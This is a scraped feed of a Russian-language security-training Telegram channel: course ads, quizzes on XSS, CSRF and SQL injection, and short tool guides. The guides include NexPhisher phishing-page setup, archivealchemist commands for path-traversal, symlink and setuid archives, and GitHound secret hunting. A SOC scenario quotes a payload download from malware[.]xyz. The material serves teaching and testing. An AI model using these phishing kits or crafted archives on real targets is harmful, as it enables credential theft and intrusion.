Ведущий: Алексей Рагузин — DevOps-инженер с 15+ годами опыта (Сбербанк, Транснефть, Россети). Преподаватель ведущих IT-школ.
Вы еще успеваете присоединиться!
Please open Telegram to view this post
VIEW IN TELEGRAM
webinar-devops.codeby.school
Вебинар «CI/CD: основы и инструменты автоматизации DevOps» — бесплатная практика для разработчиков
Присоединяйтесь к бесплатному вебинару «Основы и инструменты CI/CD» 18 июня в 19:00 МСК. Разберём этапы CI/CD-пайплайна, лучшие инструменты автоматизации (Jenkins, GitLab CI/CD, GitHub Actions, ArgoCD), покажем практику на реальном примере. Ведущий — Алексей…
❤13👍8🔥8
Airdump-ng
Airodump-ng — это утилита для захвата пакетов, которая используется в рамках набора инструментов aircrack-ng. Она позволяет собирать сырые фреймы 802.11, что делает её полезной для анализа беспроводных сетей и сбора данных о WEP и WPA шифровании.
💡 Основные функции:
⏺️ Захват трафика - Airodump-ng позволяет захватывать пакеты, проходящие через беспроводную сеть, что помогает в анализе трафика и выявлении уязвимостей.
⏺️ Отображение информации о сетях - Утилита выводит информацию о доступных точках доступа, включая их BSSID, ESSID, уровень сигнала и используемый канал.
⏺️ Сбор данных о клиентах - Airodump-ng также отображает информацию о подключенных клиентах, что позволяет отслеживать активность пользователей в сети.
📎 Установка:
Инструмент уже предустановлен в Kali Linux, способ установки для других систем:
📌 Использование:
1️⃣ Запуск утилиты
Airodump-ng — это утилита для захвата пакетов, которая используется в рамках набора инструментов aircrack-ng. Она позволяет собирать сырые фреймы 802.11, что делает её полезной для анализа беспроводных сетей и сбора данных о WEP и WPA шифровании.
Инструмент уже предустановлен в Kali Linux, способ установки для других систем:
git clone https://github.com/aircrack-ng/aircrack-ng.git
sudo airodump-ng [INTERFACE]
Утилита автоматически перевела мой сетевой адаптер в режим монитора.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10🔥5👍4
Курс по реагированию на киберинциденты — завтра последний день по старой цене! Следующий поток через 2 месяца!
РКИ — это не теория. Это практический курс, после которого вы будете:
🟧 собирать дампы с Windows/Linux,
🟧 анализировать логи и вредоносное ПО,
🟧 работать с SIEM и проводить Threat Hunting,
🟧 грамотно реагировать на атаки и искать следы проникновения.
🟧 До 19 июня 🟧 77 990 ₽ 57 990 ₽ 🟧 Сертификат
🟧 🟧 🟧 🟧 Подписка на hackerlab.pro — 40+ заданий по форензике и реагированию!
Если хотите попасть на поток по старой цене — успейте до конца дня.
🟧 Начать обучение сегодня
🚀 @Codeby_Academy
РКИ — это не теория. Это практический курс, после которого вы будете:
Если хотите попасть на поток по старой цене — успейте до конца дня.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11❤7🔥6
Злоумышленник осуществляет инъекцию произвольного JavaScript-кода через уязвимое поле пользовательского ввода (комментарии). Вредоносный скрипт сохраняется на сервере и исполняется в контексте сессии аутентифицированных пользователей при отображении заражённой страницы.
В результате:
• Происходит несанкционированное выполнение операций от имени жертвы.
• Возможна компрометация сессионных cookie (при отсутствии HttpOnly).
• Реализуется цепочка атак для эскалации привилегий.
🟧 Бонусный вопрос: Какие два основных метода защиты наиболее эффективны против этой уязвимости?
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15❤5🔥3
К какому типу уязвимостей относится данная атака?
Anonymous Poll
74%
XSS (Cross-Site Scripting)
13%
SSRF (Server-Side Request Forgery)
8%
RCE (Remote Code Execution)
5%
IDOR (Insecure Direct Object Reference)
👍13👎8❤5🔥4
Инструмент для сбора информации, использующий GitHub Code Search API. GitHound ищет открытые ключи API и другую конфиденциальную информацию на GitHub с помощью поиска кода на GitHub, сопоставления шаблонов и поиска в истории коммитов. В отличие от других инструментов он ищет по всему GitHub, а не только в определённых репозиториях, у пользователей или в организациях.
Доступны результаты поиска в режиме реального времени с помощью GitHound Explore или с помощью флага --dashboard.
Скачайте последнюю версию со страницы релизов.
Распаковываем архив:
unzip git-hound_linux_amd64.zip
Добавляем API-токен github в config.yml
В качестве альтернативы можно использовать переменные окружения, которые будут переопределять значения в config.yml:
GITHOUND_GITHUB_TOKEN: Устанавливает токен доступа к API GitHub.
GITHOUND_INSERT_KEY: Устанавливает ключ вставки GitHoundExplore для функции --dashboard.
GitHound использует базу данных регулярных выражений для ключей API, поддерживаемую авторами Gitleaks.
GitHound находит ключи API с помощью комбинации точных регулярных выражений для распространённых сервисов, таких как Slack и AWS, и универсального регулярного выражения API с учётом контекста. Это позволяет находить длинные строки, похожие на ключи API, которые окружены ключевыми словами, такими как Authorization и «API-Token». GitHound предполагает, что это ложные срабатывания, а затем проверяет их легитимность с помощью энтропии Шеннона, проверки слов из словаря, расчёта уникальности и обнаружения кодировки.
Далее он выводит результаты с высокой степенью достоверности. Для файлов, в которых кодируются секреты, он декодирует строки в формате base64 и ищет в закодированных строках ключи API.
echo "\"uberinternal.com\"" | githound --dig-files --dig-commitst --threads 100
--dig-files - Просматривает файлы репозитория, чтобы найти больше секретов;
--dig-commits - Просматривает историю коммитов, чтобы найти больше секретов.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12❤6👍5
В новом видео — разбор лабораторной работы от Дениса Соколова: пентест WordPress от первоначального доступа до повышения привилегий.
Сканирование, эксплуатация, эскалация — всё пошагово, на основе реальных техник, которые используются в профессиональных тестах на проникновение.
📺 Смотреть на YouTube
™️ Смотреть в VK
Такие практикумы — это лишь часть полноценной программы. Реальные техники, настоящая цель, никакой воды.
🟧 Запись на курс «Профессия Пентестер» до 3 июля.
Начать обучение сейчас.
🚀 @Codeby_Academy
Сканирование, эксплуатация, эскалация — всё пошагово, на основе реальных техник, которые используются в профессиональных тестах на проникновение.
Такие практикумы — это лишь часть полноценной программы. Реальные техники, настоящая цель, никакой воды.
Начать обучение сейчас.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍9🔥8😁1
Фрустрация в CTF: почему опускаются руки и как с этим бороться
🟧 Каждый, кто участвовал в CTF, знает это чувство: задача кажется нерешаемой, время уходит, а флаг так и не поддается.
В новой статье разбираем:
🟧 Почему возникает фрустрация в CTF (и почему это нормально)
🟡 Практические способы выйти из ступора
🟡 Как сохранить мотивацию, даже когда всё кажется безнадежным
🟡 Где искать помощь и вдохновение
🟧 Советы подойдут и новичкам, и опытным игрокам. Главное — понять: трудности не означают поражение.
🟧 Читайте в статью, применяйте рекомендации, и пусть ни один флаг не устоит!
В новой статье разбираем:
Please open Telegram to view this post
VIEW IN TELEGRAM
❤18👍13🔥11
🚩 Новые задания на платформе HackerLab!
👩💻 Категория Pentest Machines — Последний танец
🔎 Категория OSINT — Народный автомобиль
Приятного хакинга!
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15❤9👍7
В нашей новой статье «Я ничего не помню: как не забыть выученное. Методы обучения для информационной безопасности» вы узнаете:
Статья — без воды, с реальными техниками, ссылками и примерами для применения уже сегодня.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤16👍12🔥8👎3
Вы — SOC-аналитик. В сети компании обнаружена утечка конфиденциальных файлов. Вот что удалось собрать:
*️⃣ В 09:15 сотрудник получил письмо с темой «Договор о защите информационных систем №-4513 на подпись» от якобы доверенного контрагента.*️⃣ В 09:20 он открыл вложение — файл contract_scanned.exe, маскирующийся под PDF.*️⃣ В 09:22 на его ПК (Windows 10) запустился процесс msbuild.exe с необычными аргументами:
/tmp:7a3f1 /payload:http://malware[.]xyz/get.dll*️⃣ В 09:25 этот процесс подключился к IP 91.234.18.77 (порт 8443) и начал массово копировать файлы из сетевой папки \\NAS\Information\.
💬 Какие индикаторы компрометации (IOCs), помимо указанных в описании инцидента, можно выделить для дальнейшего поиска подобных атак в сети компании? Делитесь своими идеями!
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔10👍7❤6
Какая тактика MITRE ATT&CK здесь применена? 🟧
Anonymous Poll
19%
T1195
45%
T1204.002
23%
T1059.001
13%
T1134
🔥13👍8❤5👎2🤔1😱1
NexPhisher
NexPhisher — Это утилита для создания фишинговых страниц авторизации популярных соц.сетей, поисковиков, киноплощадок, игровых аккаунтов.
💡 Основные функции:
⏺️ Выбор нескольких сервисов - Утилита имеет большой выбор, до 30 сервисов.
⏺️ Понятный интерфейс - Программа очень простая и справится каждый.
⏺️ Большой выбор хоста - есть известные Ngrok, Serveo и новые LocalHostRun, LocalXpose.
📎 Установка:
📌 Использование:
1️⃣ Запуск утилиты
NexPhisher — Это утилита для создания фишинговых страниц авторизации популярных соц.сетей, поисковиков, киноплощадок, игровых аккаунтов.
git clone https://github.com/htr-tech/nexphisher.git
cd nexphisher
./setup
bash nexphisher
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13👍8🔥5😭1
Киберпреступления оставляют цифровые следы. Научитесь их находить.
Цифровой криминалист — это тот, кто расследует атаки, восстанавливает данные и делает виртуальный мир безопаснее.
Освойте цифровую криминалистику и реагирование на инциденты в Linux-среде. Запись до 26 июня!
⌨️ Регистрация здесь
Что вас ждёт на курсе:
🟧 Реальные кейсы, основанные на APT-отчетах
🟧 Полный цикл реагирования на инциденты с помощью opensource-инструментов
🟧 Поиск и анализ артефактов хакеров и вредоносного ПО
Кому подходит курс:
🟧 Аналитикам 1, 2, 3 линии SOC
🟧 Начинающим специалистам в DFIR и Red Team
🟧 Организациям, желающим прокачать команду по реагированию на киберинциденты и Linux-форензику
Хотите научиться расследовать кибератаки и распутывать цифровые следы?
Присоединяйтесь — узнайте всё о форензике. Начать учиться сейчас
🚀 @Codeby_Academy
Цифровой криминалист — это тот, кто расследует атаки, восстанавливает данные и делает виртуальный мир безопаснее.
Освойте цифровую криминалистику и реагирование на инциденты в Linux-среде. Запись до 26 июня!
Что вас ждёт на курсе:
Кому подходит курс:
Хотите научиться расследовать кибератаки и распутывать цифровые следы?
Присоединяйтесь — узнайте всё о форензике. Начать учиться сейчас
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13👍9🔥7😁1
В приложении есть следующий код:
SELECT * FROM users WHERE username = '" + userInput + "' AND password = '" + userPassword + "';
К какой уязвимости подвержен данный код?
Пиши свой ответ в комментарии
Please open Telegram to view this post
VIEW IN TELEGRAM
😁33👏7💯7❤🔥6👎3
Как построить успешную карьеру в тестировании на проникновение? Всё начинается с прочного базиса — тех знаний, без которых даже самые мощные инструменты останутся бесполезными.
В статье рассмотрим:
⭐ Как эффективно изучить Linux, сети и Python
⭐ Где получить реальную практику
⭐ Ошибки новичков и как их избежать
Среди обилия информации системный подход к обучению становится ключевым.
Отличной отправной точкой может стать курс "Профессия Пентестер", который поможет:
⭐ Освоить практические навыки пентеста
⭐ Подготовиться к экзамену OSCP
⭐ Получить практические задания с экспертной проверкой
➡️ Читайте полный гайд
В статье рассмотрим:
Среди обилия информации системный подход к обучению становится ключевым.
Отличной отправной точкой может стать курс "Профессия Пентестер", который поможет:
Please open Telegram to view this post
VIEW IN TELEGRAM
💯9❤🔥5👍4👏4❤3🔥2
archivealchemist — инструмент для создания специально разработанных архивов для тестирования уязвимостей при извлечении данных.
❗️ Характеристики
⏺️ Создание ZIP- и TAR-архивов с вредоносными шаблонами;
⏺️ Поддержка атак с обходом пути;
⏺️ Поддержка символических и жестких ссылок;
⏺️ Возможность устанавливать специальные биты разрешений (setuid, setgid, sticky bit);
⏺️ Точный контроль над атрибутами файлов (режим, владелец, группа, время изменения);
⏺️ Команды манипулирования: добавить, заменить, дополнить, изменить;
⏺️ Вспомогательные команды: извлечение, список, чтение;
⏺️ Создание файлов polyglot (дополните архив данными + настройте заголовки).
⬇️ Установка
Клонируем репозиторий, переходим в папку с проектом, делаем скрипт исполняемым и опциональным шагом является создание симлинка, чтобы пользоваться инструментом без привязки к необходимой директории:
⚡️ Использование
Архив с полезной нагрузкой для обхода путей:
Архив с символической ссылкой, указывающей на конфиденциальный файл:
Создание исполняемого файла с правами суперпользователя:
Создание файла, который является допустимым ZIP-файлом и начинается с магических байтов GIF
Поддерживает следующие команды
🌟 add - добавление файлов, каталогов, символических или жестких ссылок в архив;
🌟 replace - замена существующих файлов или каталогов в архиве;
🌟 append - добавление дополнительного содержимого к существующим файлам в архиве;
🌟 modify - изменение атрибутов файла или преобразование файлов в символические/жесткие ссылки;
🌟 remove/rm - удаление файлов, каталогов, символических или жестких ссылок из архива;
🌟 list/ls - отображение содержимого архива;
🌟 extract - извлечение файлов из архива в файловую систему;
🌟 read/cat - чтение файла из архива в стандартный вывод;
🌟 polyglot - добавление содержимое в архив, сохраняя его валидным.
Клонируем репозиторий, переходим в папку с проектом, делаем скрипт исполняемым и опциональным шагом является создание симлинка, чтобы пользоваться инструментом без привязки к необходимой директории:
git clone https://github.com/avlidienbrunn/archivealchemist
cd archivealchemist
chmod +x archive-alchemist.py
sudo ln -s $(pwd)/archive-alchemist.py /usr/local/bin/archive-alchemist
Архив с полезной нагрузкой для обхода путей:
archive-alchemist zipslip.zip add "../../../tmp/evil.txt" --content "I escaped the extraction directory!"
Архив с символической ссылкой, указывающей на конфиденциальный файл:
archive-alchemist symlink_attack.tar -t tar add .bashrc --symlink "/etc/passwd"
Создание исполняемого файла с правами суперпользователя:
archive-alchemist setuid_attack.tar -t tar add exploit --content "#!/bin/sh\nwhoami" --mode 0755 --setuid --uid 0
Создание файла, который является допустимым ZIP-файлом и начинается с магических байтов GIF
archive-alchemist polyglot.gif add payload.txt --content "hello there"
Поддерживает следующие команды
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12❤8👍8
О каком типе атаки идет речь?
Anonymous Poll
7%
SQL Injection
41%
Phishing
38%
CSRF (Cross-Site Request Forgery)
14%
Cross-Site Scripting (XSS)
😁15👍4❤3🔥2😭2
Злоумышленник отправляет жертве ссылку, которая выглядит как легитимный запрос на изменение пароля. Когда жертва кликает по ссылке, ее браузер выполняет действие от ее имени без ее ведома.
Please open Telegram to view this post
VIEW IN TELEGRAM
😁12👍6❤2🔥2👎1
🌐 Setezor — швейцарский нож для анализа и проектирования сетевой инфраструктуры. Данный инструмент будет полезен пентестерам, сетевикам, системным администраторам.
😮 Функционал
⏺️ Работа с веб-интерфейсом;
⏺️ Разделение на проекты;
⏺️ Табличное представление данных с возможность применения фильтров, экспорт в формате электронной таблицы;
⏺️ Генерация снимка экрана веб-ресурса;
⏺️ Поиск программного обеспечения по узлам сети;
⏺️ Активное и пассивное сканирование с использованием nmap, masscan и scapy;
⏺️ Парсинг pcap-файлов, xml-логов сканирования nmap, xml/list/json-логов сканирования masscan;
⏺️ Получение информации организовано в виде задач, при изменении статуса задачи всплывает уведомление;
⏺️ Получение списка уязвимостей для конкретного ПО посредством интеграции с search-vulns;
⏺️ Формирование отчёта по найденным уязвимостям;
⏺️ Поиск сетевых узлов по протоколу SNMP и сбор установленного программного обеспечения;
⏺️ Автоматическое построение карты сети на L3 уровне;
⏺️ Поиск субдоменов через DNS;
⏺️ Получение SSL сертификата;
⏺️ Получение детальной информации о регистре домена;
⏺️ HTTP REST API – унифицированный веб-интерфейс для взаимодействия с клиентской частью приложения и интеграциями с другими информационными системами.
✨ Установка и запуск
Скачать установочный DEB-пакет. При установке убедиться, что вы расположены в директории с DEB-пакетом, иначе прописать полный путь. Далее объявляем переменные окружения:
Запускаем сервер командой
Запускаем агента командой
На странице Settings находятся все агенты проекта и сервер. Для создания нового агента нажать на Add agent.
Для выполнения необходимых задач выбираем нужные параметры и агента, который будет выполнять действие.
Скачать установочный DEB-пакет. При установке убедиться, что вы расположены в директории с DEB-пакетом, иначе прописать полный путь. Далее объявляем переменные окружения:
sudo apt install ./setezor_<версия>.deb
export SERVER_REST_URL=https://<ip/domain>:<port>
export SECRET_KEY=abcdef
Запускаем сервер командой
setezor
.Запускаем агента командой
setezor -s -p <port>
На странице Settings находятся все агенты проекта и сервер. Для создания нового агента нажать на Add agent.
Для выполнения необходимых задач выбираем нужные параметры и агента, который будет выполнять действие.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤6🔥6